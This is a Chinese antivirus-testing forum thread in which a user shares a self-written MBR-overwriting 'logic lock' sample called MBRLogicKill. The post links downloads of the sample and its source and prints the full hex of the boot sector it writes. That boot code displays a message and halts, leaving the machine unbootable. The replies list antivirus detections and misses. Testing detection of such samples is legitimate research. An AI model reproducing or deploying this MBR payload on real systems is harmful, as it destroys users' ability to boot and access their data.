查看: 1225|回复: 14
收起左侧

[病毒样本] MBRLogicKill

[复制链接]
3245076553
发表于 2021-2-19 18:29:02 | 显示全部楼层 |阅读模式
试着写的逻辑锁
https://wwx.lanzoui.com/iHWwTluotcb
源码
https://wwx.lanzoui.com/i76XVluotba

写入硬盘MBR扇区的数据

8C C8 8E D8 8E C0 B8 1E
7C B9 0A 00 89 C5 B4 13
B0 00 B7 00 B3 07 B6 00
B2 00 CD 10 FA F4 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 80 00
01 00 05 FE 7F E6 3F 00
00 00 E8 60 77 00 00 00
41 E7 1B FE BF 65 27 61
77 00 BF 21 1F 00 00 00
81 66 0F FE FF FF E6 82
96 00 15 1D CC 01 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 55 AA


hsks
发表于 2021-2-19 18:31:31 | 显示全部楼层
本帖最后由 hsks 于 2021-2-19 18:43 编辑

360

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
a233
发表于 2021-2-19 18:31:43 | 显示全部楼层
Avast
Win32:Evo-gen [Susp]
ParanoiaSeal
发表于 2021-2-19 18:40:54 | 显示全部楼层
本帖最后由 ParanoiaSeal 于 2021-2-19 18:45 编辑

智量 Heur.ML.PE.A
火绒 miss
卡巴 KTS miss
图发不出去

卡巴 Log:
事件 :        任务已完成
应用程序名称 :        avp.exe
应用程序路径 :        C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 21.2
用户 :        DESKTOP-KUC1A7V\Paran
用户类型 :        活动用户
组件 :        病毒扫描
结果 :        任务已完成


火绒 Log:
病毒库时间:2021-02-18 17:06
开始时间:2021-02-19 18:36
总计用时:00:00:02
扫描对象:9
扫描文件:1
发现风险:0
已处理风险:0


anthonyqian
发表于 2021-2-19 18:47:19 | 显示全部楼层
诺顿不杀 信誉未知,未双击。。。
761773275
发表于 2021-2-19 18:53:00 | 显示全部楼层
本帖最后由 761773275 于 2021-2-19 18:54 编辑
anthonyqian 发表于 2021-2-19 18:47
诺顿不杀 信誉未知,未双击。。。

双击
@温馨小屋
k2132
发表于 2021-2-19 18:54:29 | 显示全部楼层
智量

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
761773275
发表于 2021-2-19 18:55:07 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
正在缓冲
头像被屏蔽
发表于 2021-2-19 18:55:18 | 显示全部楼层
Microsoft Defender
Trojan:Win32/Spursint.F!cl

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
anthonyqian
发表于 2021-2-19 18:57:28 | 显示全部楼层

等他吧 我是实机装的
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-28 21:32 , Processed in 0.134403 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表